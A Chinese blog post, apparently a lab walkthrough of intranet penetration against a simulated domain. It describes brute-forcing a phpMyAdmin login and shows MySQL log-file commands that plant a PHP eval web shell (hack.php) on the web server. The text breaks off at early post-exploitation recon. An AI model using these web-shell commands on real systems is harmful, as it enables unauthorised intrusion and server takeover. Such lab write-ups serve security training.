内网渗透实战技巧

最新推荐文章于 2024-08-20 09:51:47 发布

平静愉悦

最新推荐文章于 2024-08-20 09:51:47 发布

阅读量704

点赞数

分类专栏：笔记文章标签：安全 linux 数据库经验分享恰饭

本文链接：https://blog.csdn.net/aaahtml/article/details/115178793

版权

本文详细介绍了内网渗透的步骤，从拿下Web服务器，利用phpmyadmin后台getshell，到后渗透过程，包括权限提升、账号密码获取、远程桌面登录等。接着探讨了内网主机信息收集和横向渗透技巧，涉及MS17-010、CVE-2019-0708等多个漏洞利用。文章还分享了内网存活主机的探测和服务扫描方法，以及攻陷内网的多种攻击策略。

摘要由CSDN通过智能技术生成

拓扑图如下：

· Web服务器(Windows7)：192.168.10.14 、192.168.52.143 主机名：stu1

· 域成员主机(Windows Server 2003)：192.168.52.141 主机名：root-tvi862ubeh

· 域控(Windows Server 2008)：192.168.52.138 主机名：owa

其中，Web服务器的192.168.10.14模拟公网地址，我们可以直接访问192.168.10.14。但是我们访问不了192.168.52.0网段。

拿下Web服务器

本文主要是讲内网渗透方面，所以关于怎么拿下Web服务器，比较粗略的过。

说下我们对Web服务器的思路吧。在红蓝对抗中，拿到了入口站点，我们首先会想办法获取入口点的shell，再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。而在很多网站的登录后台后，会存在文件上传漏洞，进而getshell。

访问Web服务器地址 http://192.168.10.14/yxcms/ ，是一个yxcms的站点。关于yxcms的漏洞，传送门：代码审计| yxcms app 1.4.6 漏洞集合

对于yxcms我也不熟悉，之前没接触过。拿到目标第一先用御剑扫描下后台吧

发现phpmyadmin后台登录地址：http://192.168.10.14/phpmyadmin/

发现一个压缩包文件，该文件是网站的压缩包文件：http://192.168.10.14/beifen.rar

发现phpinfo文件：http://192.168.10.14/phpinfo.php

发现一些比较敏感的目录，这些目录都存在目录遍历漏洞

phpmyadmin后台getshell

对phpmyadmin后台进行爆破，得到账号密码：root/root

进入phpmyadmin后台后，获取shell。传送门：phpmyadmin爆破和后台getshell

这里由于 secure_file_priv的值为NULL，所以我们不能利用写into outfile写木马getshell。

这里我们利用日志文件Getshell。传送门：phpmyadmin利用日志文件Getshell

执行以下命令

set global general_log=on;                                     #开启日志
set global general_log_file='C:/phpstudy/www/yxcms/hack.php';  #设置指定文件为网站日志存放文件
SELECT '<?php eval($_POST["cmd"]);?>'               #执行该语句，会将该命令写入日志文件中点击并拖拽以移动

最后用菜刀连接，如下。

后渗透第一步

在拿到了Web服务器的权限后，我们就要尽可能多的搜集该服务器的信息，然后搭建隧道通往内网！

执行以下命令我们知道当前的用户身份是 administrator ，在管理员组中，并且处在域 god 中。该主机有两张网卡，分别是：192.168.10.14，192.168.52.143。由此可知，其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录，为啥不以本地普通用户登录？？)